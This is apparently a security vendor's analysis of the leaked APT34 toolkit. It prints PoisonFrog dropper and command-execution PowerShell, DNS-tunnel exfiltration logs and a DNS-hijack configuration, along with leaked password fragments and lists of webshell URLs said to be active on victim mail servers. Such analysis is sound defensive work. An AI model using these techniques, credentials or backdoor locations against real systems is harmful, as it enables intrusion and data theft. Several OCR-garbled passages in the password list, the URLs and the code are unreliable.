APT34 Event Analysis Report

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1 Overview

On April 18, 2019 a hacker/hacker organization sold a toolkit of the APT34 group, under the false name of Lab Dookhtegan, on a Telegram channel. The organization also posted screenshots of the tool's backend panels, where victim data had been collected. Early in the middle of March 2019, this hacker/hacker organization had released and sold this toolkit on the Internet. Interestingly, the CEO of a security company in Kuwait took to Twitter to stress in particular the authenticity of this post.





We can verify and confirm that Iranian threat actor OilRig/APT34 leaks are authentic, true and credible and they match our previous investigations and IR engagements in GCC Region in terms of Tactics, Techniques, Procedures, Victims and Data. #OilRig #APT34

Tools included in the leaked toolkit are listed as follows:

- Glimpse: a new trojan based on PowerShell, dubbed BondUpdater by Palo Alto Networks
- PoisonFrog: an old version of BondUpdater
- HyperShell
- HighShell: dubbed TwoFace by Palo Alto Networks
- MinionProject: Fox management interface with the HighShell module loaded
- Webmask: HTTP proxy hijacking tool, the main tool behind DNSpionage, used for DNS tunneling

NSFOCUS Security Labs and NSFOCUS M01N Security Research Team made an analysis of this toolkit together and found that tools included in the leaked toolkit differed from the previously released attacks tools of the APT34 group. In this report, we have made a detailed analysis of the leaked tools from the perspectives of tactics, techniques and procedures (TTPs).

1.1 Distribution of Attack Targets by Industry

In addition to countries in the Middle East, APT34 has also hit China Mainland, China Taiwan, Turkey, Albania, and other countries and regions. China Mainland and China Taiwan both received a large proportion of attacks.

Through analysis, we have found 12 malicious WebShell files used to target China Energy Conservation and Environmental Protection Group, China Railway Construction Corporation, and Western Securities Co., Ltd. among other Chinese companies, as well as six such files used to be against companies in Hong Kong, Macao, and Taiwan.



The released toolkit also contains a lot of passwords which are packaged and released in different archives according to information sources.

Cdhq.gov.ae.zip	612	0	WinKAR ZIP	2019/4/18 1/	9D166/0F
🔁 Dubai Media Inc.zip	3,140	0	WinRAR ZIP 压缩	2019/4/18 17	A523E8
Emirates Federal Competitivenes	797	0	WinRAR ZIP 压缩	2019/4/18 17	476F0366
Emirates Ministry of Presidental	8,048	0	WinRAR ZIP 压缩	2019/4/18 17	9C820624
Emirates National Oil Co (2).zip	1,924	0	WinRAR ZIP 压缩	2019/4/18 17	BF53A0A9
Emirates National Oil Co.zip	5,870	0	WinRAR ZIP 压缩	2019/4/18 17	418B5369
Emirates NMC National Media C	30,537	0	WinRAR ZIP 压缩	2019/4/18 17	A25763
Emirates Policy Center.zip	596	0	WinRAR ZIP 压缩	2019/4/18 17	FB21770E
Emirates Prime Minister Office.zip	573	0	WinRAR ZIP 压缩	2019/4/18 17	49797D
Etithad Airways.zip	91,781	0	WinRAR ZIP 压缩	2019/4/18 17	97488C7B
Glimpse.zip	179,331	0	WinRAR ZIP 压缩	2019/4/18 17	8CE1A693
Jordan NITC - National Informat	14,473	0	WinRAR ZIP 压缩	2019/4/18 17	908128F4
Jordan Software solutions comp	9,294	0	WinRAR ZIP 压缩	2019/4/18 17	528B69EB
Kuwait Amiri Diwan da.gov.kw.zip	8,987	0	WinRAR ZIP 压缩	2019/4/18 17	D4EB32EF
Elamprell Energy Ltd.zip	493	0	WinRAR ZIP 压缩	2019/4/18 17	49DE65
National Securtiy Agency of Bah	819	0	WinRAR ZIP 压缩	2019/4/18 17	A81EFB92
Nigerian building and road rese	1,408	0	WinRAR ZIP 压缩	2019/4/18 17	34E2D9F2
Coman Administrative court adm	2,201	0	WinRAR ZIP 压缩	2019/4/18 17	8F78EA95
posion frog.zip	24,259	0	WinRAR ZIP 压缩	2019/4/18 17	E41F50D9

From the above figure, we can see that the archive names contain airport names and oil company names. More than 12,000 weak passwords were disclosed this time.

ERP*p*rotify|P@ssw0rd Ev ail2|P@ssw0rd Ev ail3|P@ssw0rd ev smbx1 |P@ssw0rd ev smbx2 |P@ssw0rd KL lmin |P@ssw0rd Ne ickup P@ssw0rd Ib n' Mansour |P@ssw0rd12345 ne er as |P@ssw0rd2016 ne 331 ce |P@ssw0rd2016 ne 351 celf%ssw0rd2016 ne 351 -vce|P@ssw0rd2016 Ma: |F sw0rd54321 ma: ma yab|P@ssw0rd54321 Ali lamini|Test1234 alr a.alsafi|12345 byr yn|12345 net n 12345 sal marketing 12345 Alm :her 123456 ebd t 123456 Nas yem 123456 SF / 123456 s' f 123456 g 7. woman | 12349 Ta sol | 1234567 .woman 1234567 12345678 Câ ialmultaga 12345678 ď o zz P0\$\$w0rd f khari Password123

1.2 About APT34

The APT34 group, named by FireEye, uses tools and attack approaches that bear a high resemblance to the OilRig organization, an organization active in the Middle East followed up by Palo Alto Networks. The APT34 group started to carry out malicious activities as early as in 2014, targeting governments and the financial, energy, chemical, and telecom sectors. This group, though often seen in the Middle East, also hits China, as indicated in files leaked this time.

On November 4, 2017, FireEye discovered that this group exploited the vulnerability (CVE-2017-11882) to launch attacks by leveraging tools similar to those leaked this time.

2 TTPs

During the functional analysis of APT34's leaked sample, we have ascertained the attack tactics and techniques used by this hacking group, via a reverse deduction based on attack procedures. Overall, four phases of the kill chain are involved: privilege escalation, collection, exfiltration, and command and control.

Privilege Escalation

This leaked sample uses multiple WebShell backdoor programs like HighShell, HyperShell, and MinionProject, each of which is a .NET program. Some of these programs encrypt the communications in order to evade defense measures. By reference to the tool use record documents included in the leaked files and the list of websites compromised by APT34, we can see that this hacking group mainly uses these WebShell programs, placed in /owa/auth/, to target the Outlook email system of the Exchange server. This sample's attack targets are found all around the world, including 14 enterprises in the energy and securities sectors in the Chinese mainland. By the time this report is released, some of those WebShell backdoor programs are still active.

C:\Program Files\Microsoft\Exchange Server\V15\FrontEnd\HttpProxy\owa\auth\

getidtokens.aspx OutlookDC.aspx

w;9uTJ0Dpm8(+4\`0FwEjiFspa

The following figure shows WebShell backdoors targeting companies in China:

7 https://1202.179.13/owa/auth/error1.aspx	mail.ccccp.cn	China	Active
8 https://1.302.179.14/owa/auth/error1.aspx	mail.cecep.cn	China	Active
9 https://1142551901/owa/auth/error1.aspx	mail.general -chans.cn	China	Active
10 https://100 166 27 217/owa/auth/error3.aspx	exchange.b+el#.com.cn	China	Active
11 https://180 169 13 230/owa/auth/error1.aspx	bdp.com.cn	China	Active
12 https://210 22 172 26/owa/auth/error1.aspx	Iswebext sciet.com.cn	China	Active
13 https://221.b.148.238/owa/auth/outlook.aspx	mail swsc.com.cn	China	Active
14 https://2221/11/01li/owa/auth/outlook.aspx	mail:www.com.cn	China	Active
15 https://222.66.8.76/owa/auth/error1.aspx	Iswebext.adaa.com.cn	China	Active
16 https://58 210 216 113/owa/auth/error1.aspx	mail.rewzy.com.cn	China	Active
17 https://60.247.31.237/owa/auth/error3.aspx	crocne.cn	China	Active
18 https://NI 747 31 73 (/owa/auth/logoff.aspx	contracte.cn	China	Active
19 https://202 104 127 218/owa/auth/error1.aspx	mail an a com	services	Active
20 https://202 104 127 218/owa/auth/exppw.aspx	mail 2 is di com	services	Active

The following table lists URLs of active WebShells:

WebShell	Website	Country/Region
https://202.***.***.31/owa/auth/signout.aspx	rtarf.****.th	Thailand
https://202.***.***.4/owa/auth/signout.aspx	rtarf.****.th	Thailand
https://122.***.136/owa/auth/error3.aspx	mail.****.com.tw	Taiwan
https://202.***.***.169/owa/auth/signin.aspx	*****.com{outlook}	
https://202.***.***.206/owa/auth/signout.aspx	wmail.*****.com	
https://213.***.51/owa/auth/logon.aspx	*****.gov.tr{outlook}	Turkey
https://1.***.***.13/owa/auth/error1.aspx	mail.****.cn	China
https://1.***.***.14/owa/auth/error1.aspx	mail.*****.cn	China
https://114.***.***.1/owa/auth/error1.aspx	mail.generali-****.cn	China
https://180.***.***.217/owa/auth/error3.aspx	exchange.*****.com.cn	China
https://180.***.***.230/owa/auth/error1.aspx	*****.com.cn	China
https://210.***.***.26/owa/auth/error1.aspx	lswebext.****.com.cn	China
https://221.***.230/owa/auth/outlook.aspx	mail.*****.com.cn	China
https://222.***.***.8/owa/auth/outlook.aspx	mail.*****.com.cn	China
https://222.***.***.76/owa/auth/error1.aspx	*****.****.com.cn	China
https://58.***.***.113/owa/auth/error1.aspx	mail.*****.com.cn	China
https://60.***.237/owa/auth/error3.aspx	*****.cn	China
https://60.***.***.237/owa/auth/logoff.aspx	*****.cn	China
https://202.***.***.218/owa/auth/error1.aspx	mail.****.com	
https://202.***.***.218/owa/auth/exppw.aspx	mail.*****.com	
https://132.***.165/owa/auth/logout.aspx	CSEX.****.technion.ac.il	Israel
https://132.***.165/owa/auth/signout.aspx	CSEX.csf.****.ac.il	Israel
https://209.***.***.35/owa/auth/logout.aspx	mail.*****.co.zw	Zimbabwe
https://114.***.22/owa/auth/login.aspx	mail.*****.ws	Samoa
https://114.***.3/owa/auth/login.aspx	mail.****.ws	Samoa
https://185.***.199/owa/auth/logout.aspx	******.com.sa	Saudi Arabia
https://46.***.****.125/owa/auth/signin.aspx	*****.com.sa	Saudi Arabia
https://51.***.***.170/owa/auth/owaauth.aspx	*****.edu.sa	Saudi Arabia

WebShell	Website	Country/Region
https://91.***.***.155/owa/auth/signin.aspx	*****.gov.sa	Saudi Arabia
https://83.***.***.132/owa/auth/logon.aspx	mail.*****.com.ps{outlook}	Palestine
https://78.***.***.199/owa/auth/logon.aspx	*****.gov.qa{outlook}	Qatar
https://110.***.***.90/owa/auth/errorff.aspx	mail.fmis.*****.gov.kh	Cambodia
https://211.***.68/owa/auth/error1.aspx	mailexchange.*****.co.kr	North Korea
https://168.***.***.220/owa/auth/error3.aspx	mail.tc-*****.co	Colombia
https://213.***.***.221/owa/auth/errorff.aspx	*****.gov.kw	Kuwait
https://77.***.125/owa/auth/logout.aspx	{ul.*****.lb}	Lebanon
https://202.***.***.11/owa/auth/error1.aspx	webmail.*****.com.mo	Масао
https://202.***.***.141/owa/auth/error3.aspx	*****.must.edu.mo	Масао
https://213.***.***.73/owa/auth/error4.aspx	ad.*****.eg{shell}	Egypt
https://200.***.***.13/owa/auth/error3.aspx	sre.*****.mx	Mexico
https://202.***.***.68/owa/auth/error0.aspx	mfa.****.mn	Myanmar
https://202.***.***.68/owa/auth/error1.aspx	mifa.****.mn	Myanmar
https://197.***.***.10/owa/auth/logout.aspx	mail.*****.gov.ng	Nigeria
https://41.***.***.221/owa/auth/logout.aspx	mail.*****.gov.ng	Nigeria
https://mail.*****.ae/owa/auth/change_password.aspx	mail.****.ae	United Arab Emirates
https://mail.*****.com.sa/owa/auth/GetLoginToken.aspx	mail.*****.com.sa	Saudi Arabia
https://webmail.*****.bh/owa/auth/Timeoutctl.aspx	webmail.****.bh	Bahrain
https://webmail.*****.bh/owa/auth/EventClass.aspx	webmail.****.bh	Bahrain
https://webmail.*****.bh/ecp/auth/EventClass.aspx	webmail.****.bh	Bahrain
http://*****.ae:8080/_layouts/WrkStatLog.aspx	*****.ae	United Arab Emirates
https://www.*****.jo/statistic.aspx	www.*****.jo	Jordan
https://e-****.al/dptaktkonstatim.aspx	e-****.al	Albania
https://webmail.*****.ae/owa/auth/RedirSuiteService.aspx	webmail.*****.ae	United Arab Emirates
https://webmail.*****.ae/owa/auth/handlerservice.aspx	webmail.****.ae	United Arab Emirates

Collection

Our Webmask analysis of this leaked sample mainly focuses on attacks against Outlook. Through the analysis, we found that such attacks used the email connection and man-in-the-browser (MITB) technologies. Also, we dissected the sample's source code and instructions and discovered that this tool could steal users' email account passwords and cookies for Outlook authentication as well as inject code into traffic for further information collection.



icap_service password_req reqmod_precache bypass=1 icap://127.0.0.1:1344/password #icap_service password_resp respmod_precache bypass=1 icap://127.0.0.1:1344/password icap_service cookie_req reqmod_precache bypass=1 icap://127.0.0.1:1344/cookie #icap_service inject_req reqmod_precache bypass=1 icap://127.0.0.1:1344/inject icap_service inject_resp respmod_precache bypass=1 icap://127.0.0.1:1344/inject icap_service headers_req reqmod_precache bypass=1 icap://127.0.0.1:1344/headers #icap_service headers_resp respmod_precache bypass=1 icap://127.0.0.1:1344/headers #icap_service headers_resp respmod_precache bypass=1 icap://127.0.0.1:1344/headers #icap_service basic_req reqmod_precache bypass=1 icap://127.0.0.1:1344/headers #icap_service basic_resp respmod_precache bypass=1 icap://127.0.0.1:1344/headers

Exfiltration

In this phase, the Exfiltration Over Command and Control Channel tactic is applied. The attacker sends sensitive data to the controlled server using a DNS protocol through command and control, in a way to avoid information disclosure due to common data loss prevention techniques.

19:53:03.770303 IP 192.168.36.155.53486 > ubuntu.domain:	57450+ A? 20009f13Pf0d514BCC15T.example.com. (51)
19:53:07.787129 IP 192.168.36.155.63149 > ubuntu.domain:	19619+ A? 20009f1M3f0d51A568DC14T.example.com. (53)
19:53:07.787235 IP 192.168.36.155.55472 > ubuntu.domain:	32957+ A? 20009f13Pf0d514BCC15T.example.com. (51)
19:53:07.788535 IP ubuntu.domain > 192.168.36.155.63149:	19619*- 1/0/0 A 99.250.250.199 (69)
19:53:07.817885 IP 192.168.36.155.55472 > ubuntu.domain:	32957+ A? 20009f13Pf0d514BCC15T.example.com. (51)
19:53:08.833313 IP 192.168.36.155.55472 > ubuntu.domain:	32957+ A? 20009f13Pf0d514BCC15T.example.com. (51)
19:53:10.847647 IP 192.168.36.155.55472 > ubuntu.domain:	32957+ A? 20009f13Pf0d514BCC15T.example.com. (51)
19:53:14.848209 IP 192.168.36.155.55472 > ubuntu.domain:	32957+ A? 20009f13Pf0d514BCC15T.example.com. (51)
19:53:19.012242 IP 192.168.36.155.53042 > ubuntu.domain:	11075+ A? 20009f13f00d51A193F4C17T.example.com. (54)
19:53:19.013401 IP ubuntu.domain > 192.168.36.155.53042:	11075*- 1/0/0 A 24.125.10.100 (70)
19:53:19.114573 IP 192.168.36.155.49383 > ubuntu.domain:	61141+ A? 29f13f00001d51B971DC67T.example.com. (53)
19:53:19.116412 IP ubuntu.domain > 192.168.36.155.49383:	61141*- 1/0/0 A 110.101.116.0 (69)
19:53:19.181854 IP 192.168.36.155.61945 > ubuntu.domain:	896+ A? 29f13f10003d51AB814C86T.example.com. (53)
19:53:19.182839 IP ubuntu.domain > 192.168.36.155.61945:	896*- 1/0/0 A 32.117.115.3 (69)
19:53:19.245627 IP 192.168.36.155.53228 > ubuntu.domain:	32362+ A? 29f100613f0d51C36104EC43T.example.com. (55)
19:53:19.246636 IP ubuntu.domain > 192.168.36.155.53228:	32362*- 1/0/0 A 101.114.10.6 (71)
19:53:19.309420 IP 192.168.36.155.55616 > ubuntu.domain:	521+ A? 29009f13f0d511B6F234C29T.example.com. (54)
19:53:19.311332 IP ubuntu.domain > 192.168.36.155.55616:	521*- 1/0/0 A 1.2.3.0 (70)
19:53:20.603400 IP 192.168.36.155.54668 > ubuntu.domain:	31697+ A? 29f213f0000d51000004C73T.COCTab333332233332222222222222222210100A11
58AAAAAAAAAAAAAAAAAA.33333210100A.example.com. (128)	
19:53:20.606446 IP ubuntu.domain > 192.168.36.155.54668:	31697*- 1/0/0 A 29.2.3.1 (144)
19:53:20.633202 IP 192.168.36.155.61220 > ubuntu.domain:	15895+ A? 29f00113f0d52100004C39T.EB84667676672566667725E88E9A23FBFD932F3F64
079E4F730B7986CC01.33333210100A.example.com. (127)	
19:53:20.636328 IP ubuntu.domain > 192.168.36.155.61220:	15895*- 1/0/0 A 29.2.3.2 (143)
19:53:20.651512 IP 192.168.36.155.51442 > ubuntu.domain:	9374+ A? 29f10023f0d5210000D745F8C49T.3232333332333500262233332466760E0E1776
3E437DDA839020180D932F.33333210100A.example.com. (132)	
19:53:20.653628 IP ubuntu.domain > 192.168.36.155.51442:	9374*- 1/0/0 A 29.2.3.3 (148)
19:53:20.679550 IP 192.168.36.155.59737 > ubuntu.domain:	59036+ A? 20039f13f02d510000C903E5C17T.7667246776767666E88EB9E99E88E93F6403F
20F2149FE3024FD7596906C.33333210100A.example.com. (132)	
19:53:20.684400 IP ubuntu.domain > 192.168.36.155.59737:	59036*- 1/0/0 A 29.2.3.4 (148)
19:53:20.697196 IP 192.168.36.155.60268 > ubuntu.domain:	18580+ A? 29f123f0004d510000E72096C84T.8E98E8AE880000444444442333323396D3589
302DADA3FDD1E4F02019F04.33333210100A.example.com. (132)	

Command and Control

The leaked sample used two remote access Trojans (RATs), **poisonfrog.ps1** (old version) and Glimpse (**dns_main.ps1**) (new version), for remote control of the target server by using a DNS protocol for communication.

After a sample analysis, we found that both versions of RATs used PowerShell as an agent for code execution, and prior to that, the RATs needed to hijack the victim's DNS server for DNS redirection in order to parse the domain name suffix designated by the attacker. By generating a subdomain with a specific algorithm, the victim's machine performs a DNS query to request an A/TXT record of the subdomain from the DNS server (C2 server) and obtains the IP address provided by the C2 server for communications. In addition, the attacker will create a scheduled task to execute the PowerShell script regularly to obtain information from the C2 server before executing commands. The C2 server mainly provides command execution and file upload and download functions.

The C2 server of the old version already implements proxy detection and can download files from the remote server for web proxy configuration. The old version only supports the query of DNS A records and generates subdomain names that contain part of the UUID (Universally Unique Identifier) value of the victim's system.

The C2 server of the new version does not involve proxy configuration and deems that the DNS hijacking is already completed. It can parse DNS TXT records and generate subdomain names that do not contain the UUID value of the victim's system.



3 Trojan and WebShell Analysis

The following figures show the directory structure of each tool used by this leaked sample:

Glimpse:



PoisonFrog:

agent
poisonfrog.ps1
L-server side
0000000000.bat
9999999999.bat
config.json
filesList
installing mongo_nodejs
install_pachages.bat
stop dnsmasq
routes
index.js
L—views
agents.ejs
login.ejs
notfound.ejs
panel.ejs
result.ejs

Webmask:

guide.txt	
install.sh	
dns-redir config.json dnsd.js dnsd.py	
Licap	
icap.py	

Webshells_and_Panel:



When sorting out files and trying to reproduce the sample, we found that remote control tools had an incomplete logic which renders one-click deployment impossible. These tools can run properly only after an analysis and reconfiguration is completed. MinionProject, however, cannot directly execute due to the lack of files.

分析器错误	
战略: 在分析向武计	1求提供服务所需资源时出端。通检查下列特定分析错误详细信息并适当地传动源文件。
***	業我到路径"C-Instput/awww.cofaspnet_clientMinioriHighShell.ocal/picomponents/loginbar.html"的一部分。
行 1056:	<pre><div class="pusher contentPlace" style="/*flex-grow: 1; flex-direction: column; display: flex; */"></div></pre>
行 1057:	<div id="header"></div>
	#include file ="is/components/loginbay html"
行 1058:	<pre>sine sine sine = js/components/loginosi.nest ==></pre>
行 1058: 行 1059:	< #include file = "js/components/maintab.html>

To sum up, we believe that the leaked toolkit is incomplete, which should be noted during analysis of the toolkit. So far, no backdoor is discovered left by the leaker.

3.1 Glimpse

Glimpse is a remote control tool that uses DNS tunneling. It consists of an agent, a panel, and a server.

3.1.1 Agent

The agent is a program at the controlled end.

Major Functions

The startup script is **runner_.vbs** which is used to start the main script of PowerShell.

The main script is **dns_main.ps1** used for communications with the server.

File-related Operations

The program generates the directory **PUBLIC\Libraries\guid** (hereinafter referred to as the agent directory in which guid is generated by **Dns_main.ps1**) and creates folders in this directory like **receivebox**, **sendbox**, and **done** to communicate with the server by reading or writing into files in these folders.

Communication Process

- The agent can communicate with the server through the ping mode (DNS A mode) or text mode (DNS TXT mode). Commands received by the agent from the server are saved as files with RCVD as the file name prefix in the \receivebox\ directory of the agent.
- 2. Check the commands from the server and perform the related behavior.

The following table lists commands from the server.

Trailing Byte Meaning Operation of a Command File Name

Trailing Byte of a Command File Name	Meaning	Operation
0	Executing commands issued by the server	Reads contents from the command file, executes them as CMD commands, and saves the command output as a file with proc as the file name prefix in the agent directory, \sendbox .
1	Uploading a file	Places the file designated in the body of the command file in the agent directory \sendbox and sends this file to the C&C server.
Others	Downloading a file	Places the command file in the agent directory \done.

1. After executing commands issued by the server, the agent will send the file saved in the agent directory **\sendbox** to the server.

3.1.2 Panel

The panel is the graphic panel of Glimpse, used to manage the communications between the agent and the server.



3.1.3 Server

The server issues commands to the agent, instructing it what to do next.

Major Functions

The server uses a DNS tunneling protocol for communications, issuing commands to the agent or receiving files uploaded by the agent via the DNS tunnel of the A or TXT type.

File-related Operations

The program generates the directory **ALLUSERSPROFILE/Glimpse/dns/aid/** (hereinafter referred to as the server directory in which **aid** indicates the guid ID received from the agent) and then creates folders like **wait**, **receive**, **done**, **sended**, and **sending** in this directory to communicate with the agent

by reading or writing into files in those folders.

Communication Process

- 1. Receives false DNS requests from the agent.
- 2. Parses information received from the agent by using local rules.

For a false DNS request, the contents are in the format of data.mainData.mainData2.mainData3, each part of which contains different contents.

Data

0–14	15–n	n+1	n+2	n+3	n+4
dataRand	Unknown	С	reqNoIndex	actionIndex	Т

If the data contains the trailing string CxxT (x indicates arbitrary characters), the server determines that the data is based on a tunneling protocol.

If the data contains the trailing string in other formats than CxxT, the server forwards the data.

datarand: records the action and aid. The data location is variable and determined by both reqNoIndex and actionIndex.

aid: ID of the packet, based on which the server directory is generated on the server.

action: action of the agent.



Value of the action Field	Operation
Μ	The agent checks the mode folder in the specific directory and handles ping information.
W	The server, in the DNS TXT manner, merges the contents in the wait folder in the server directory and sends them.
D	The server sends the contents in the wait folder in the server directory as fragments in DNS TXT manner.
0	The server disguises names of files in the wait folder as IP strings and sends them to the agent.

Value of the action Field	Operation
1	The server sends files in the wait folder as fragments to the agent in DNS A manner.
2	The server receives files by fragment from the agent in DNS A manner and saves them in the part folder.

mainData: saves the body of the command file.

mainData2: saves the command file name.

mainData3: saves the domain name of the C&C server.

Tunnel Format

The server is a forged DNS server which responds to the agent's DNS requests by returning designated IP strings. Different IP strings have different meanings, as shown in the following table.

IP String	Meaning
99.250.250.199	The server responds to a new agent and creates a session.
199.250.250.99	The server responds to the ping information of the agent.
3.2.1.0	The server has files to be sent.
24.125.a.b	A file named a+b waits to be sent by the server.
11.24.237.110	There are files to be sent by the server.
a.b.c.d	The server sends fragments as DNS A records. In this IP string, a.b.c indicates the data contents and d indicates the data index.
1.2.3.0	Fragments are sent by the server.
a.2.3.b	The server is receiving fragments from the agent. In this IP string, ${\bf a}$ indicates the agent ID and ${\bf b}$ indicates the fragment ID.
253.25.42.87	The server has received fragments from the agent.

3.2 PoisonFrog

Major Functions

PoisonFrog is a remote control tool that can steal information from the controlled server and execute CMD commands issued by the C&C server.

Operation Process

1. The **ps1** script executes to release the **hUpdater.ps1** and **dUpdater.ps1** scripts and the **UpdateTask.vbs** script as well as set Windows scheduled tasks.

- 2. The **ps1** script accesses the C&C domain and uploads and downloads files as instructed by commands issued via the domain.
- The ps1 script identifies the trailing character of the name of the file downloaded from the C&C server as the command and operates on files in the specified directory as instructed by this command.
- 4. As a scheduled task, the vbs script is set to execute every 10 minutes.

The following figure shows part of contents of the poisonfrog.ps1 script.

```
${global:$address1} = $env:PUBLIC + "\Public";
${global:$address1} = $env:PUBLIC + "\Public";
${global:$address1} = "DANDQA&FICATEWALERACEWPYdC5jb2010w0KJEREQQA&FICd1dC13bW1vmp1Y3QqV21uMzJfQ29teHV0ZKJTEXN0ZW1Qem9kdWN01CB81FN1bGVjdC1PYmp1Y3QqLUV4cGFUEFByb3B
${global:$htp_ag] = "DENQCA&FIC3dEWvd5F1AETPteXN02W01mW0LkRuc1060kd1dEhvc3REGRYZXXEXMoIn15b6Vmd6h1YXJUEnNvb5IpDQoke2dsb2hbbokQ0NBfSA&FIC51dy1vmp1Y3QqC3
if (-not (Test-Fath -Fath ${global:$address1})
[md ${global:$address1}; Get-Item ${global:$address1} -Force | ${$_.attributes = "Hidden"}}
if (Test-Fath -Fath ${global:$address1})
[d ${gstem.Text.Encoding]:UTF9.GetString([System.Convert]::FromBase64String{[string]${global:$htp_ag}}] | Set-Content "${global:$address1}\hUpdater.ps1";
[System.Text.Encoding]:UTF9.GetString([System.Convert]::FromBase64String{[string]${global:$ddmess1}] | Set-Content "${global:$address1}\hUpdater.ps1";
[command0 = "Fowershell.exe -exec bypass -file ${global:$address1}\hUpdater.ps1"`nset Shell0 = CreateObject("#script.shell'") 'nshell0.run command0, 0, fa
schtasks /create /F /sc minute /mo 10 /tn "\UpdateTasks\UpdateTasks\UpdateTaskSVpdateTasksVpdateTasks.vbs\'"";
```

Component Analysis

hUpdater.ps1

This script is mainly used to send data to the C&C server and receive commands and files from this server.

When **cfg.ini** exists, the **hUpdater.ps1** script will read contents from this file to extract the proxy and communicate with the C&C server in proxy mode.

```
$FFA = $EEA+"cfg.ini";

bif(Test-Path $FFA) {

    $ls = Get-Content $FFA | Where { $_-notmatch '^\s+$' }

    foreach ($1 in $ls)

    {

        $GGA = $1 -split ','

        if($GGA[0] -eq "srv") {$HHA = $GGA[1] + "";}

        if($GGA[0] -eq "usr") {$IIA = $GGA[1] + "";}

        if($GGA[0] -eq "pas") {$JJA = $GGA[1] + "";}

        if($GGA[0] -eq "prt") {$KKA = $GGA[1] + "";}

        if($GGA[0] -eq "dom") {$LLA = $GGA[1] + "";}

        if($GGA[0] -eq "dom") {$LLA = $GGA[1] + "";}

        }

        $u = "http://" + $HHA + ":" + $KKA;

        $MMA = new-object System.Net.WebProxy($u, $true);

        $NNA = new-object System.Net.NetworkCredential($IIA, $JJA, $LLA)

        $MMA.credentials = $NNA

        $(global:$CCA).proxy = $MMA;

    } else {$(global:$CCA}.proxy = [System.Net.WebProxy]::GetDefaultProxy()}
```

As for command format parsing, the **hUpdater.ps1** script obtains strings from the C&C server and splits them into four or more arrays with angle brackets. SSA[0]<>SSA[1]<>SSA[2]<>SSA[3]<>SSA[4] <>SSA[5] is such an example. In the string, each array corresponds to a different response function. For instance, when SSA[2] has a value other than **not**, it downloads files to a specified directory. The following table describes functions of these arrays.

Command Description

SSA[0] When SSA[0] has a value other than **not**, upload the file named **SSA[0]** to the URI /**fil/domain name/SSA[0]** and then delete the original file.

Command	Description
SSA[1]	When SSA[1] has a value other than not , it uploads strings to a specified URL. SSA[1] code has been commented out.
SSA[2]	When SSA[0] has a value other than not , download the file under / fil/SSA[3] to the local directory C://SSA[0]/SSA[2].
SSA[4]	When SSA[4] has a value other than not , upload the SSA[4] file to / fil /domain name/SSA[0].

SSA[5] When the array length is 2, continue to perform operations within the loop.



dUpdater.ps1

The **dUpdater.ps1** script parses the trailing character in the file name located first during the traversal of the **receivebox** folder, as a command. The following table describes the mapping between commands and the script's functions.

Command	Description
0	The dUpdater.ps1 script parses the contents in the ZZA[0] file in the receivebox folder and writes the contents into the ZZA[0] file in the sendbox directory. If the ZZA[0] file exists in the receivebox folder, this script will delete this file.
1	If the contents in the ZZA[0] file in the receivebox folder is parsed as a file path, the dUpdater.ps1 script copies this file to the sendbox directory and then deletes the ZZA[0] file in the receivebox folder.
2	The dUpdater.ps1 script moves the ZZA[0] file in the receivebox folder to the done / directory and types 200 <> plus <i>the path of the done/ directory</i> as the content of this file and then deletes the ZZA[0] file in the receivebox folder.

```
$BBB = ${global:$QQA} + "\" + $ZZA[0];
$MAD = $BBB -replace "receivebox", "sendbox";
if ($BBB.EndsWith("0"))
    $NNB = Get-Content $BBB | ? { $_.trim(} -ne "" };
$OOB = ${global:$AAB} + "\" + $ZZA[0];
    $NNB = $NNB | ? { $_.trim() -ne "" }
$PPB += $NNB+"\n";
     $PPB += $NNB.Split("4") | foreach-object { Try { $_ | iex | Out-String } Catch { $_ | Out-String} }
    $PPB +"<>" | Set-Content $00B -Encoding UTF8
    if (Test-Path -Path $BBB)
    1
         Remove-Item -path $BBB;
     }
}
elseif ($BBB.EndsWith("1"))
t
    $QQB = Get-Content $BBB | ? ( $_.trim() -ne "" ) | %( $_.Replace("`0", "").Trim() }
     if (Test-Path -Path $00B)
         $00B = ${global:$AAB} + "\" + $ZZA[0];
         Copy-Item -path $008 -destination $008 -Force;
    )
    else
     £
         "File not exist" | Set-Content $MMB;
    3
    if (Test-Path -Path $BBB)
    {
         Remove-Item -path $BBB;
     5
3
elseif ($BBB.EndsWith("2"))
ł
    $RRB = $BBB -replace "receivebox", "done";
Move-Item -path $BBB -destination $RRB -Force;
    if (Test-Path -Path $RRB)
     1
         ("200<>" + $RRB) | Set-Content $MMB;
         Remove-Item -path $BBB;
    5
```

Server-Side Scripts

The scripts are used to assemble commands (e.g. SSA[0]<>SSA[1]<>SSA[2]<>SSA[3]<>SSA[4] <>SSA[5]) and store data. Each function has its own function.

Function	Description
Panel	Serves as a control panel.
NotFount	Notifies the log-in user of the login failure.
Posted	Issues commands from the agent panel to upload and download files.
Deletecommand	Deletes commands from the database.
Deleteagent	Deletes the agent and its related files.
Descriptionposted	Describes information returned by the server.
Fileposted	Sends files to the receive folder on the server.
Agent	Creates the receive , send , and wait folders in each agentID folder and stores files that contain commands in such folders and writes commands into the database.

3.3 WebMask

This tool is used by the APT34 group as a DNS proxy and for HTTP hijacking.

Major Functions

This tool consists of three parts:

- Shell script sh: used for installation
- py: used to steal passwords and for hijacking
- py, dnsd.js, and config.json: used to configure the local DNS proxy Component Analysis

DNSd Module

This module starts the local DNS proxy. The configuration file and the IP address of the proxy server are specified with startup parameters. By default, the script only does DNS forwarding.

The DNSd module can be started using the python script (dnsd.py) or JavaScript (dnsd.js).

guide.txt explains two way to use the DNSd tool.

1. **py** is used as a transparent proxy.



1. The native-dns module is used as a DNS proxy. As shown in the following figure, 195.229.237.52 is the IP address of a DNS server in the United Arab Emirates and 185.162.235.106 is a bot IP address used as an example.

```
----Solution2 (use this)
apt-get install curl
apt-get install sudo
curl -sL https://deb.nodesource.com/setup_6.x | sudo -E bash -
sudo apt-get install -y nodejs
npm install -g forever
npm install -g forever-service
<copy dns_redir>
cd dns_redir
npm install native-dns
<edit dnsd.js>
            var zone = 'tra.gov.ae';
            var domainName = ['webmail.tra.gov.ae', 'dns.tra.gov.ae'];
            var zone = 'tra.gov.ae';
var authorative = 195.229.237.52; //must be ip
            var responseIP = 185.162.235.106;
            var server = dns.createServer();
forever-service install dns-server --script dnsd.js --start
```

Icap Module

This module is a tool written in PyICAP. PyICAP is a python3 framework for writing ICAP servers. ICAP is usually used to extend transparent proxy servers, implementing content filters in the transparent HTTP proxy cache and performing specific services (can be specified by developers) for HTTP requests/responses.



The extract_login_password method is used to steal account passwords included in HTTP information and record them in a designated file. It extracts data in HTTP requests using regular expressions.

